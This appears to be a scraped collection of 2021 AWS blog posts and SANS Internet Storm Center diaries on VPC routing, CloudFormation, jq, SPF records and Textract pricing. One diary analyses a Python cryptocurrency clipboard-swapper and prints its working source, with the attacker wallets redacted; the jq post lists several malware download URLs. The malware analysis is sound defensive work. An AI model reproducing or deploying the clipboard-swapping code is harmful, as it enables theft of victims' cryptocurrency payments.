    --output text)

aws --region $REGION ssm start-session --target $BASTION_ID

After you’re connected to the bastion host, issue the following cURL command to connect to the application host:

sh-4.2$ curl -I 10.0.1.239 # use the private IP address of your application host
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 24 May 2021 10:00:22 GMT
Content-Type: text/html
Content-Length: 12338
Last-Modified: Mon, 24 May 2021 09:36:49 GMT
Connection: keep-alive
ETag: "60ab73b1-3032"
Accept-Ranges: bytes

To verify the traffic is really flowing through the appliance, you can enable source/destination check on the instance again. Use the --source-dest-check parameter with the modify-instance-attribute CLI command above. The traffic is blocked when the source/destination check is enabled.

I can also connect to the appliance host and inspect traffic with the tcpdump command.

(on your laptop)
APPLIANCE_ID=$(aws --region $REGION ec2 describe-instances     
                   --filter "Name=tag:Name,Values=appliance" 
		   --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" 
  		   --output text)

aws --region $REGION ssm start-session --target $APPLIANCE_ID

(on the appliance host)
tcpdump -i eth0 host 10.0.0.16 # the private IP address of the bastion host

08:53:22.760055 IP ip-10-0-0-16.us-west-2.compute.internal.46934 > ip-10-0-1-104.us-west-2.compute.internal.http: Flags [S], seq 1077227105, win 26883, options [mss 8961,sackOK,TS val 1954932042 ecr 0,nop,wscale 6], length 0
08:53:22.760073 IP ip-10-0-0-16.us-west-2.compute.internal.46934 > ip-10-0-1-104.us-west-2.compute.internal.http: Flags [S], seq 1077227105, win 26883, options [mss 8961,sackOK,TS val 1954932042 ecr 0,nop,wscale 6], length 0
08:53:22.760322 IP ip-10-0-1-104.us-west-2.compute.internal.http > ip-10-0-0-16.us-west-2.compute.internal.46934: Flags [S.], seq 4152624111, ack 1077227106, win 26847, options [mss 8961,sackOK,TS val 4094021737 ecr 1954932042,nop,wscale 6], length 0
08:53:22.760329 IP ip-10-0-1-104.us-west-2.compute.internal.http > ip-10-0-0-16.us-west-2.compute.internal.46934: Flags [S.], seq 4152624111, ack 1077227106, win 26847, options [mss 

Cleanup
If you used the CDK script I provided for this post, be sure to run cdk destroy when you’re finished so that you’re not billed for the three EC2 instances and the NAT gateway I use for this demo. Running the demo script in us-west-2 costs $0.062 per hour.

Things to Keep in Mind.
There are couple of things to keep in mind when using VPC more specific routes :

  • The network interface or service endpoint you are sending the traffic to must be in a dedicated subnet. It cannot be in the source or destination subnet of your traffic.
  • You can chain appliances. Each appliance must live in its dedicated subnet.
  • Each subnet you’re adding consumes a block of IP addresses.  If you’re using IPv4, be conscious of the number of IP addresses consumed (A /24 subnet consumes 256 addresses from your VPC). The smallest CIDR range allowed in a subnet is /28, it just consumes 16 IP addresses.
  • The appliance’s security group must have a rule accepting incoming traffic on the desired port. Similarly, the application’s security group must authorize traffic coming from the appliance security group or IP address.

This new capability is available in all AWS Regions, at no additional cost.

You can start using it today.

New for AWS CloudFormation – Quickly Retry Stack Operations from the Point of Failure

This post was originally published on this site

One of the great advantages of cloud computing is that you have access to programmable infrastructure. This allows you to manage your infrastructure as code and apply the same practices of application code development to infrastructure provisioning.

AWS CloudFormation gives you an easy way to model a collection of related AWS and third-party resources, provision them quickly and consistently, and manage them throughout their lifecycles. A CloudFormation template describes your desired resources and their dependencies so you can launch and configure them together as a stack. You can use a template to create, update, and delete an entire stack as a single unit instead of managing resources individually.

When you create or update a stack, your action might fail for different reasons. For example, there can be errors in the template, in the parameters of the template, or issues outside the template, such as AWS Identity and Access Management (IAM) permission errors. When such an error occurs, CloudFormation rolls back the stack to the previous stable condition. For a stack creation, that means deleting all resources created up to the point of the error. For a stack update, it means restoring the previous configuration.

This rollback to the previous state is great for production environments, but doesn’t make it easy to understand the reason for the error. Depending on the complexity of your template and the number of resources involved, you might spend lots of time waiting for all the resources to roll back before you can update the template with the right configuration and retry the operation.

Today, I am happy to share that now CloudFormation allows you to disable the automatic rollback, keep the resources successfully created or updated before the error occurs, and retry stack operations from the point of failure. In this way, you can quickly iterate to fix and remediate errors and greatly reduce the time required to test a CloudFormation template in a development environment. You can apply this new capability when you create a stack, when you update a stack, and when you execute a change set. Let’s see how this works in practice.

Quickly Iterate to Fix and Remediate a CloudFormation Stack
For one of my applications, I need to set up an Amazon Simple Storage Service (Amazon S3) bucket, an Amazon Simple Queue Service (SQS) queue, and an Amazon DynamoDB table that is streaming item-level changes to an Amazon Kinesis data stream. For this setup, I write down the first version of the CloudFormation template.

AWSTemplateFormatVersion: "2010-09-09"
Description: A sample template to fix & remediate
Parameters:
  ShardCountParameter:
    Type: Number
    Description: The number of shards for the Kinesis stream
Resources:
  MyBucket:
    Type: AWS::S3::Bucket
  MyQueue:
    Type: AWS::SQS::Queue
  MyStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: !Ref ShardCountParameter
  MyTable:
    Type: AWS::DynamoDB::Table
    Properties:
      BillingMode: PAY_PER_REQUEST
      AttributeDefinitions:
        - AttributeName: "ArtistId"
          AttributeType: "S"
        - AttributeName: "Concert"
          AttributeType: "S"
        - AttributeName: "TicketSales"
          AttributeType: "S"
      KeySchema:
        - AttributeName: "ArtistId"
          KeyType: "HASH"
        - AttributeName: "Concert"
          KeyType: "RANGE"
      KinesisStreamSpecification:
        StreamArn: !GetAtt MyStream.Arn
Outputs:
  BucketName:
    Value: !Ref MyBucket
    Description: The name of my S3 bucket
  QueueName:
    Value: !GetAtt MyQueue.QueueName
    Description: The name of my SQS queue
  StreamName:
    Value: !Ref MyStream
    Description: The name of my Kinesis stream
  TableName:
    Value: !Ref MyTable
    Description: The name of my DynamoDB table

Now, I want to create a stack from this template. On the CloudFormation console, I choose Create stack. Then, I upload the template file and choose Next.

Console screenshot.

I enter a name for the stack. Then, I fill the stack parameters. My template file has one parameter (ShardCountParameter) used to configure the number of shards for the Kinesis data stream. I know that the number of shards should be greater or equal to one, but by mistake, I enter zero and choose Next.

Console screenshot.

To create, modify, or delete resources in the stack, I use an IAM role. In this way, I have a clear boundary for the permissions that CloudFormation can use for stack operations. Also, I can use the same role to automate the deployment of the stack later in a standardized and reproducible environment.

In Permissions, I select the IAM role to use for the stack operations.

Console screenshot.

Now it’s time to use the new feature! In the Stack failure options, I select Preserve successfully provisioned resources to keep, in case of errors, the resources that have already been created. Failed resources are always rolled back to the last known stable state.

Console screenshot.

I leave all other options at their defaults and choose Next. Then, I review my configurations and choose Create stack.

The creation of the stack is in progress for a few seconds, and then it fails because of an error. In the Events tab, I look at the timeline of the events. The start of the creation of the stack is at the bottom. The most recent event is at the top. Properties validation for the stream resource failed because the number of shards (ShardCount) is below the minimum. For this reason, the stack is now in the CREATE_FAILED status.

Console screenshot.

Because I chose to preserve the provisioned resources, all resources created before the error are still there. In the Resources tab, the S3 bucket and the SQS queue are in the CREATE_COMPLETE status, while the Kinesis data stream is in the CREATE_FAILED status. The creation of the DynamoDB table depends on the Kinesis data stream to be available because the table uses the data stream in one of its properties (KinesisStreamSpecification). As a consequence of that, the table creation has not started yet, and the table is not in the list.

Console screenshot.

The rollback is now paused, and I have a few new options:

Retry – To retry the stack operation without any change. This option is useful if a resource failed to provision due to an issue outside the template. I can fix the issue and then retry from the point of failure.

Update – To update the template or the parameters before retrying the stack creation. The stack update starts from where the last operation was interrupted by an error.

Rollback – To roll back to the last known stable state. This is similar to default CloudFormation behavior.

Console screenshot.

Fixing Issues in the Parameters
I quickly realize the mistake I made while entering the parameter for the number of shards, so I choose Update.

I don’t need to change the template to fix this error. In Parameters, I fix the previous error and enter the correct amount for the number of shards: one shard.

Console screenshot.

I leave all other options at their current values and choose Next.

In Change set preview, I see that the update will try to modify the Kinesis stream (currently in the CREATE_FAILED status) and add the DynamoDB table. I review the other configurations and choose Update stack.

Console screenshot.

Now the update is in progress. Did I solve all the issues? Not yet. After some time, the update fails.

Fixing Issues Outside the Template
The Kinesis stream has been created, but the IAM role assumed by CloudFormation doesn’t have permissions to create the DynamoDB table.

Console screenshots.

In the IAM console, I add additional permissions to the role used by the stack operations to be able to create the DynamoDB table.

Console screenshot.

Back to the CloudFormation console, I choose the Retry option. With the new permissions, the creation of the DynamoDB table starts, but after some time, there is another error.

Fixing Issues in the Template
This time there is an error in my template where I define the DynamoDB table. In the AttributeDefinitions section, there is an attribute (TicketSales) that is not used in the schema.

Console screenshot.

With DynamoDB, attributes defined in the template should be used either for the primary key or for an index. I update the template and remove the TicketSales attribute definition.

Because I am editing the template, I take the opportunity to also add MinValue and MaxValue properties to the number of shards parameter (ShardCountParameter). In this way, CloudFormation can check that the value is in the correct range before starting the deployment, and I can avoid further mistakes.

I select the Update option. I choose to update the current template, and I upload the new template file. I confirm the current values for the parameters. Then, I leave all other options to their current values and choose Update stack.

This time, the creation of the stack is successful, and the status is UPDATE_COMPLETE. I can see all resources in the Resources tab and their description (based on the Outputs section of the template) in the Outputs tab.

Console screenshot.

Here’s the final version of the template:

AWSTemplateFormatVersion: "2010-09-09"
Description: A sample template to fix & remediate
Parameters:
  ShardCountParameter:
    Type: Number
    MinValue: 1
    MaxValue: 10
    Description: The number of shards for the Kinesis stream
Resources:
  MyBucket:
    Type: AWS::S3::Bucket
  MyQueue:
    Type: AWS::SQS::Queue
  MyStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: !Ref ShardCountParameter
  MyTable:
    Type: AWS::DynamoDB::Table
    Properties:
      BillingMode: PAY_PER_REQUEST
      AttributeDefinitions:
        - AttributeName: "ArtistId"
          AttributeType: "S"
        - AttributeName: "Concert"
          AttributeType: "S"
      KeySchema:
        - AttributeName: "ArtistId"
          KeyType: "HASH"
        - AttributeName: "Concert"
          KeyType: "RANGE"
      KinesisStreamSpecification:
        StreamArn: !GetAtt MyStream.Arn
Outputs:
  BucketName:
    Value: !Ref MyBucket
    Description: The name of my S3 bucket
  QueueName:
    Value: !GetAtt MyQueue.QueueName
    Description: The name of my SQS queue
  StreamName:
    Value: !Ref MyStream
    Description: The name of my Kinesis stream
  TableName:
    Value: !Ref MyTable
    Description: The name of my DynamoDB table

This was a simple example, but the new capability to retry stack operations from the point of failure already saved me lots of time. It allowed me to fix and remediate issues quickly, reducing the feedback loop and increasing the number of iterations that I can do in the same amount of time. In addition to using this for debugging, it is also great for incremental interactive development of templates. With more sophisticated applications, the time saved will be huge!

Fix and Remediate a CloudFormation Stack Using the AWS CLI
I can preserve successfully provisioned resources with the AWS Command Line Interface (CLI) by specifying the --disable-rollback option when I create a stack, update a stack, or execute a change set. For example:

aws cloudformation create-stack --stack-name my-stack 
    --template-body file://my-template.yaml -–disable-rollback
aws cloudformation update-stack --stack-name my-stack 
    --template-body file://my-template.yaml --disable-rollback
aws cloudformation execute-change-set --stack-name my-stack --change-set-name my-change-set 
    --template-body file://my-template.yaml --disable-rollback

For an existing stack, I can see if the DisableRollback property is enabled with the describe stack command:

aws cloudformation describe-stacks --stack-name my-stack

I can now update stacks in the CREATE_FAILED or UPDATE_FAILED status. To manually roll back a stack that is in the CREATE_FAILED or UPDATE_FAILED status, I can use the new rollback stack command:

aws cloudformation rollback-stack --stack-name my-stack

Availability and Pricing
The capability for AWS CloudFormation to retry stack operations from the point of failure is available at no additional charge in the following AWS Regions: US East (N. Virginia, Ohio), US West (Oregon, N. California), AWS GovCloud (US-East, US-West), Canada (Central), Europe (Frankfurt, Ireland, London, Milan, Paris, Stockholm), Asia Pacific (Hong Kong, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo), Middle East (Bahrain), Africa (Cape Town), and South America (São Paulo).

Do you prefer to define your cloud application resources using familiar programming languages such as JavaScript, TypeScript, Python, Java, C#, and Go? Good news! The AWS Cloud Development Kit (AWS CDK) team is planning to add support for the new capabilities described in this post in the next couple of weeks.

Spend less time to fix and remediate your CloudFormation stacks with the new capability to retry stack operations from the point of failure.

Danilo

Cryptocurrency Clipboard Swapper Delivered With Love , (Mon, Aug 30th)

This post was originally published on this site

Be careful if you're a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I'm talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you'll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for "interesting data" (like wallet addresses) and tries to replace it with another one. If you perform a payment operation, it means that you will transfer some BTC or XMR to the wrong wallet, owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this.The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and has a current score of 17/57[1]. The main code is obfusctated in a Base64-encode variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added in the script to defeat some automated analysis. The script is based on the pyperclip[2] library that is common in the Python ecosystem. It allows manipulating the clipboard. The fact that the script does not test if the module is already installed makes me think that this script is part of a framework or has dependencies with others.

The clipboard is controlled at regular intervals and searched for classic cryptocurrencies through regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet. Two are two defined in this sample.

Here is the code:

#If I know what love is
import pyperclip
#I fell in love with her courage
import json
#If you live to be a hundred
import time
#A man is already halfway in love
import re
#Women are meant to be loved
import argparse
#You make me want to be a better man
from datetime import datetime
#Thinking of you keeps me

def main():
    # infinite keeps me
    while 1:
        now = datetime.now()
        
        time.sleep(2)  #Let me love you
        #There is never a time or place for true love
        user_clipboard = pyperclip.paste()
        #true love
        crypto_found = spiff(
            user_clipboard
        )  
        replacement_address = replace(
            user_clipboard, crypto_found
        )  
#love is so short, forgetting is so long
        
master_addresses = {
  "btc": "xxxxxxxxxx",
  "xmr": "null",
  "eth": "xxxxxxxxxx",
  "dash": "null",
  "xrp": "null",
  "doge": "null",
  "ada": "null",
  "lite": "null",
  "dot": "null",
  "tron": "null"
}
#cares and fears
def replace(user_clipboard, crypto_found):

    if crypto_found != 0 and master_addresses[crypto_found] != "null":
        pyperclip.copy(master_addresses[crypto_found])
        return str(master_addresses[crypto_found])
    return 0
#until love’s vulnerable

def spiff(user_clipboard):
    crypto_regex_match = {
        "btc": "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$",
        "xmr": "4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}",
        "eth": "^0x[a-fA-F0-9]{40}$",
        "dash": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
        "xrp": "^r[0-9a-zA-Z]{24,34}$",
        "doge": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
        "ada": "^D[A-NP-Za-km-z1-9]{35,}$",
        "lite": "^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        "tron": "^T[a-zA-Z0-9]{33}$",
        "dot": "^[1-9A-HJ-NP-Za-km-z]*$",
    }
    #I love you without knowing how
    for k, v in crypto_regex_match.items():
        if bool(re.search(v, user_clipboard)):
            return str(k)

    return 0
    #A purpose of human life

main()
#Love is always patient and kind

I checked the two wallets in the script but then don't show any transaction at this time.

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection
[2] https://pypi.org/project/pyperclip/
[3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Filter JSON Data by Value with Linux jq, (Sun, Aug 29th)

This post was originally published on this site

Since JSON has become more prevalent as a data service, unfortunately, it isn't at all BASH friendly and manipulating JSON data at the command line with REGEX (i.e. sed, grep, etc.) is cumbersome and difficult to get the output I want.

So, there is a Linux tool I use for this, jq is a tool specifically written to manipulate and filter the data I want (i.e. like scripting and extract the output I need) from large JSON file in an output format I can easily read and manipulate.

The most common form of logs I work with are JSON arrays (start and end []). For example, using a basic example like this to demonstrate how to iterate over an array:

echo '["a","b","c"]' | jq '.[]'

which will result to this using the object value iterator operator .[] will print each item in the array on a separate line:

"a"
"b"
"c"

In this next example, I take the data from the bot_ip.json file, parse the list of IP addresses and which site they came from. Before parsing this file, here is how the raw output of the file starts:

cat bot_ip.json | jq '.objects[].ip + ": " + .objects[].source' | sort | uniq

The output looks like this:

"212.39.114.139: Botscout BOT IPs"
"216.131.104.82: Botscout BOT IPs"
"2607:90:6628:470:0:4:0:801: Botscout BOT IPs"

Since this file contains objects before the open [, I use it as an anchor to start parsing the data I want to see. I added the column (:) separator between the IP and the data source.

This second example is with mal_url.json which contain know malware URL location. Before parsing this file, here is how the file starts:

cat mal_url.json | jq '.objects[].value + ": " + .objects[].source + ": " + .objects[].threat_type' | sort | uniq

"http://103.82.81.37:42595/Mozi.a: URLHaus: malware"
"http://103.84.240.226:45940/Mozi.m: URLHaus: malware"
"http://110.178.73.97:34004/Mozi.m: URLHaus: malware"

Using this test file available here, it contains several records that can be used to manipulate JSON data. Using wget, download the file to a Linux workstation [2] and ensure that jq is already installed (i.e. CentOS:  yum -y install jq). Next take a quick look at the raw file using a Linux command of your choice (less, more, cat, etc) before parsing some of the data with jq. To view the data properly formatted and readable, use this command:

cat large-file.json | jq | more

Manipulate the data to get a list of actors with the current information, run this command:

cat large-file.json | jq '.[].actor' | more

To get just the list of actor login information, add .login to .actor:

cat large-file.json | jq '.[].actor.login' | more

What are some of your favorite tools to manipulate JSON data?

[1] https://stedolan.github.io/jq/manual/
[2] https://github.com/json-iterator/test-data/raw/master/large-file.json
[3] https://gchq.github.io/CyberChef/
[4] http://iplists.firehol.org/?ipset=botscout

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the latest AWS Heroes – August 2021

This post was originally published on this site

AWS Heroes go above and beyond to share knowledge with the community and help others build better and faster on AWS. Last month we launched the AWS Heroes Content Library, a centralized place where Builders can find inspiration and learn from AWS Hero authored educational content including blogs, videos, slide presentations, podcasts, open source projects, and more. As technical communities evolve new Heroes continue to emerge, and each quarter we recognize an outstanding group of individuals from around the world whose impact on community knowledge-sharing is significant and greatly appreciated.

Today we are pleased to introduce the newest AWS Heroes, including the first Heroes based in Cameroon and Malaysia:

Denis Astahov – Vancouver, Canada

Community Hero Denis Astahov is a Solutions Architect at OpsGuru, where he automates and develops various cloud solutions with Infrastructure as Code using Terraform. Denis owns the YouTube channel ADV-IT, where he teaches people about a variety of IT and especially DevOps topics, including AWS, Terraform, Kubernetes, Ansible, Jenkins, Git, Linux, Python, and many others. His channel has more than 70,000 subscribers and over 7,000,000 views, making it one of the most popular free sources for AWS and DevOps knowledge in the Russian speaking community. Denis has more than 10 cloud certifications, including 7 AWS Certifications.

Ivonne Roberts – Tampa, USA

Serverless Hero Ivonne Roberts is a Principal Software Engineer with over fifteen years of software development experience, including ten years working with AWS and more than five years building serverless applications. In recent years, Ivonne has begun sharing that industry knowledge with the greater software engineering community. On her blog ivonneroberts.com and her YouTube channel Serverless DevWidgets, Ivonne focuses on demystifying and removing the hurdles of adopting serverless architecture and on simplifying the software development lifecycle.

Kaushik Mohanraj – Kuala Lumpur, Malaysia

Community Hero Kaushik Mohanraj is a Director at Blazeclan Technologies, Malaysia. An avid cloud practitioner, Kaushik has experience in the evaluation of well-architected solutions and is an ambassador for cloud technologies and digital transformation. Kaushik holds 10 active AWS Certifications, which help him to provide relevant and optimal solutions. Kaushik is keen to build a community he thrives in and hence joined AWS User Group Malaysia as a co-organizer in 2019. He is also the co-director of Women in Big Data – Malaysia Chapter, with an aim to build and provide a platform for women in technology.

Luc van Donkersgoed – Utrecht, The Netherlands

DevTools Hero Luc van Donkersgoed is a geek at heart, solutions architect, software developer, and entrepreneur. He is fascinated by bleeding edge technology. When he is not designing and building powerful applications on AWS, you can probably find Luc sharing knowledge in blogs, articles, videos, conferences, training sessions, and Twitter. He has authored a 16-session AWS Solutions Architect Professional course, presented on various topics including how the AWS CDK will enable a new generation of serverless developers, appeared on the AWS Developers Podcast, and he maintains the AWS Blogs Twitter Bot.

Rick Hwang – Taipei City, Taiwan

Community Hero Rick Hwang is a cloud and infrastructure architect at 91APP in Taiwan. His passion to educate developers has been demonstrated both internally as an annual AWS training project leader, and externally as a community owner of SRE Taiwan. Rick started SRE Taiwan on his own and has recruited over 3,600 members over the past 4 years via peer-to-peer interactions, constantly sharing content, and hosting annual study group meetups. Rick enjoys helping people increase their understanding of AWS and the cloud in general.

Rosius Ndimofor – Douala, Cameroon

Serverless Hero Rosius Ndimofor is a software developer at Serverless Guru. He has been building desktop, web, and mobile apps for various customers for 8 years. In 2020, Rosius was introduced to AWS by his friend, was immediately hooked, and started learning as much as he could about building AWS serverless applications. You can find Rosius speaking at local monthly AWS meetup events, or his forte: building serverless web or mobile applications and documenting the entire process on his blog.

Setia Budi – Bandung, Indonesia

Community Hero Setia Budi is an academic from Indonesia. He runs a YouTube channel named Indonesia Belajar, which provides learning materials related to computer science and cloud computing (delivered in Indonesian language). His passion for the AWS community is also expressed by delivering talks in AWS DevAx Connect, and he is actively building a range of learning materials related to AWS services, and streaming weekly live sessions featuring experts from AWS to talk about cloud computing.

Vinicius Caridá – São Paulo, Brazil

Machine Learning Hero Vinicius Caridá (Vini) is a Computer Engineer who believes tech, data, & AI can impact people for a fairer and more evolved world. He loves to share his knowledge on AI, NLP, and MLOps on social media, on his YouTube channel, and at various meetups such as AWS User Group São Paulo where he is a community leader. Vini is also a community leader at TensorFlow São Paulo, an open source machine learning framework. He regularly participates in conferences and writes articles for different audiences (academic, scientific, technical), and different maturity levels (beginner, intermediate, and advanced).

 

 

 

 

If you’d like to learn more about the new Heroes, or connect with a Hero near you, please visit the AWS Heroes website or browse the AWS Heroes Content Library.

Ross;

Amazon Textract Updates: Up to 32% Price Reduction in 8 AWS Regions and Up to 50% Reduction in Asynchronous Job Processing Times

This post was originally published on this site

Introduced at AWS re:Invent 2018, Amazon Textract is a machine learning service that automatically extracts text, handwriting and data from scanned documents that goes beyond simple optical character recognition (OCR) to identify, understand, and extract data from forms and tables.

In the past few months, we introduced specialized support for processing invoices and receipts and enhanced the quality of the underlying computer vision models that power extraction of handwritten text, forms, and tables with printed text support for English, Spanish, German, Italian, Portuguese, and French.

Third-party auditors assess the security and compliance of Amazon Textract as part of multiple AWS compliance programs. We also added IRAP compliance support and achieved US FedRAMP authorization to add to the existing list such as HIPAA, PCI DSS, ISO SCO, and MTCS.

Customers use Amazon Textract to automate critical business process workflows (for example, in claims and tax form processing, loan applications, and accounts payable). It can reduce human review time, improve accuracy, lower costs, and accelerate the pace of innovation on a global scale. At the same time, Textract customers told us that we could be doing even more to reduce costs and improve latency.

Today we are excited to announce two major updates to Amazon Textract:

  • Up to 32 percent price reduction in 8 AWS Regions to help global customers save even more with Textract.
  • Up to 50 percent reduction in end-to-end job processing times for Textract’s asynchronous operations worldwide.

Up to 32% price reduction in 8 AWS Regions
We are pleased to announce an up to 32 percent price reduction in eight AWS Regions: Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Canada (Central), Europe (Frankfurt), Europe (London), and Europe (Paris).

The API pricing for DetectDocumentText (OCR) and AnalyzeDocument (both forms and tables) in these AWS Regions is now the same as the US East (N. Virginia) Region pricing. Customers in those identified Regions will see a 9-32 percent reduction in API pricing.

Before the price reduction, a customer’s usage of the DetectDocumentText and AnalyzeDocument APIs would have been billed at different rates, by Region, for their usage tier. That customer will now be billed at the same rate, no matter from which AWS commercial Region Textract is being called.

AWS Regions DetectDocumentText API AnalyzeDocument API (forms + tables)
Old New Reduction Old New Reduction
Asia Pacific (Mumbai) $1.830 $1.50 18% $79.30 $65.0 18%
Asia Pacific (Seoul) $1.845 19% $79.95 19%
Asia Pacific (Singapore) $2.200 32% $95.00 32%
Asia Pacific (Sydney) $1.950 23% $84.50 23%
Canada (Central) $1.655 9% $72.15 10%
Europe (Frankfurt) $1.875 20% $81.25 20%
Europe (London) $1.750 14% $75.00 13%
Europe (Paris) $1.755 15% $76.05 15%

This table shows two examples of effective price per 1,000 pages for processing the first 1 million monthly pages before and after this price reduction. Customers with usage above the 1 million monthly pages tier will also see a similar reduction in prices, the details of which can be found on the Amazon Textract pricing page.

The new pricing goes into effect on September 1, 2021. It will be applied to your bill automatically. This pricing change does not apply to the Europe (Ireland), US-based commercial Regions, and US GovCloud Regions. There is no change to the pricing for the recently launched AnalyzeExpense API for invoices and receipts.

As part of the AWS Free Tier, you can get started with Amazon Textract for free. The Free Tier lasts 3 months and new AWS customers can analyze up to 1,000 pages per month using the Detect Document Text API and up to 100 pages per month using the Analyze Document API or Analyze Expense API.

Up to 50% reduction in end-to-end job processing times
Customers can invoke Textract synchronously (on single-page documents) and asynchronously (on multi-page documents) for detecting printed and handwritten lines and words (via the DetectDocumentText API) as well as for forms and tables extraction (via the AnalyzeDocument API). We see that the vast majority of customers invoke Textract asynchronously today for at-scale processing of their document pipeline.

Based on customer feedback, we have made a number of enhancements to Textract’s asynchronous API operations that reduce the end-to-end latency by as much as 50 percent. Specifically, these updates reduce the end-to-end job processing times experienced by Textract customers on worldwide asynchronous operations by as much as 50 percent. The lower the processing time, the faster customers are able to process their documents, achieve scale and improve their overall productivity.

To learn more about Amazon Textract, see this tutorial for extracting text and structured data from a document, this code sample on GitHub, Amazon Textract documentation, and blog posts about Amazon Textract on the AWS Machine Learning Blog.

Channy

There may be (many) more SPF records than we might expect, (Wed, Aug 25th)

This post was originally published on this site

The Sender Policy Framework (SPF[1]) is a simple but fairly powerful mechanism that may be used (ideally in connection with DKIM[2] and DMARC[3]) to combat phishing to some degree. Basically, it allows a domain name owner to publish a special DNS TXT record containing a list of servers that are authorized to send e-mails for that domain. Existence of this record and its contents is automatically checked by modern e-mail servers whenever they receive an e-mail that appears to come from a certain domain and if the sending server is not on the “approved list” for that domain, the message may be dealt with in a special way – for example marked as potentially fraudulent, moved to a quarantine folder, or even dropped entirely.

The structure of an SPF record is quite simple – after an SPF version specification (v=spf1) one may list “directives”. These are specifications of IP addresses, domain names or other DNS records, that identify valid sources of e-mail for the domain (they may be preceded by a + symbol or – in some instances – an “include” keyword). After the list of “approved senders”, the record should end with a directive that specifies that no other servers may send e-mail for that domain. This may be done by ~all (so called “softfail”) or -all directives, which indicates that no other servers are approved for sending e-mail for that domain.

One might end an SPF record using a “neutral” ?all directive, which would basically mean “an e-mail coming from all other sources, than the ones explicitly listed, should be treated as if this SPF record didn’t exist” (which can be useful for initial deployment or troubleshooting, but defeats the purpose of SPF in any other case, at least when it’s used on its own without DMARC). An SPF record might even end using a +all directive, which would specify that all sources that were not mentioned are explicitly permitted to send messages for the domain. Setting such an SPF record would however be completely nonsensical, since it would basically allow all servers everywhere to legitimately send e-mail on behalf of the domain in question.

A typical SPF record might therefore look like this one, which is currently set for wikimedia.org:

v=spf1 ip4:91.198.174.0/24 ip4:208.80.152.0/22 ip6:2620:0:860::/46 include:_spf.google.com ip4:74.121.51.111 ~all

Some SPF records may include additional mechanisms and be slightly more complex, but for our purposes, the form mentioned above (a list of “valid” senders followed by -all or ~all directive) is quite sufficient.

What’s important to note is that if a record doesn’t specify how e-mail from “all” other senders should be treated (i.e. it doesn’t end in ~all or -all directive), then a ?all directive is implicitly added to its end. This means that a record that is not properly terminated makes very little impact, since it only specifies “allowed” senders, but does not specify that any other sender is not allowed to send e-mails on behalf of the domain.

Although it may seem strange, given what we just mentioned, it is widely accepted that a not insignificant number of SPF records do explicitly end with the ?all directive, which is something that phishing authors sometimes use to their advantage[4,5].

At this point you might reasonably ask what is meant by “a not insignificant number of records”.

Although I can’t offer you hard data for the entire internet, I am in the position to do so for a small part of it – specifically for the .CZ TLD.

The Czech national domain name registry, CZ.NIC (which also operates the Czech National CSIRT) recently created a tool that allows them to scan (literally) all of the domains in the CZ ccTLD space for arbitrary “properties”, such as supported TLS ciphersuits or specific DNS records. And since “misconfigured” SPF records are a pet peeve of mine, ever since I learned about the existence of this tool, I have been bothering a colleague from the National CSIRT, @e2rd_rejthar, with requests for data for SPF-related DNS records. This week, he was kind enough to send them to me, which means I can now share with you fairly exact numbers related to SPF use (though – admittedly – only in a very small part of the internet).

As you may see from the chart, there were many more SPF records than one might have expected (or, at least, that I would have). There were 1,401,785 .CZ domains registered on the day of the scan (August 19th) and these domains used 1,101,489 SPF records in total. Since one may “chain” multiple SPF records for one domain, this does not necessarily mean that over 78.5 % of all CZ domains had SPF record set, but even so, the number is still very high.

Correction – after checking with my colleague, the 1.1M really refers to the number of individual domains with SPFv1 records set, which means that 78.5 % of .cz domains really do have an SPF record.

What’s also surprising is the comparatively small number of “less than optimally set” records. The ?all directive was present in only 35,270 records (~3.2 %) and the “whoever included this should have known better” +all directive was present in only 558 records.

Although the numbers for domains in the .cz TLD are most likely not representative of the wider internet, who knows – maybe there are significantly more SPF records overall than we might expect and perhaps the issue with ?all directives isn’t as commonplace as it used to be… We can only hope.

[1] https://datatracker.ietf.org/doc/html/rfc7208
[2] https://datatracker.ietf.org/doc/html/rfc6376
[3] https://datatracker.ietf.org/doc/html/rfc7489
[4] https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/
[5] https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.